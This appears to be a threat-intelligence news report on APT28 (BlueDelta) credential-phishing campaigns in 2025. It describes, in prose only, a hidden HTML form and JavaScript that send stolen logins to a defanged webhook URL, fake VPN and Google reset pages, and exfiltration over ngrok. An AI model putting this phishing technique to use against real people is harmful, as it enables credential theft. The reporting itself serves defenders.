Researchers uncovered a phishing setup that relies on a concealed HTML form element containing a webhook[.]site URL. JavaScript embedded in the page quietly sends a “page opened” signal, captures any credentials entered by the victim, and forwards them to the webhook endpoint. After the data is sent, the victim is redirected back to a PDF hosted on the legitimate website, reducing suspicion.
The threat group known as APT28, also tracked as BlueDelta, has been linked to several other credential-harvesting campaigns observed throughout 2025.
- June 2025: Attackers deployed a fake password reset page designed to imitate a Sophos VPN portal. The page was hosted on infrastructure provided by InfinityFree. Credentials submitted by victims were harvested before users were redirected to a legitimate Sophos VPN login page belonging to an unnamed E.U.-based think tank.
- September 2025: Another campaign used credential-stealing pages hosted on InfinityFree domains. Victims were shown false warnings claiming their passwords had expired. After entering their login details, users were redirected to real authentication pages tied to a military organization in the Republic of North Macedonia and an IT services firm in Uzbekistan.
- April 2025: In a separate operation, attackers set up a counterfeit Google password reset page hosted through Byet Internet Services. Stolen credentials were then exfiltrated through an ngrok endpoint.
According to analysis from a Mastercard-owned security firm, BlueDelta’s repeated misuse of legitimate hosting and relay services highlights its ongoing dependence on disposable infrastructure to collect and transmit stolen credentials. The activity reflects the GRU’s continued focus on credential harvesting as a low-cost, effective way to gather intelligence in support of Russian strategic objectives.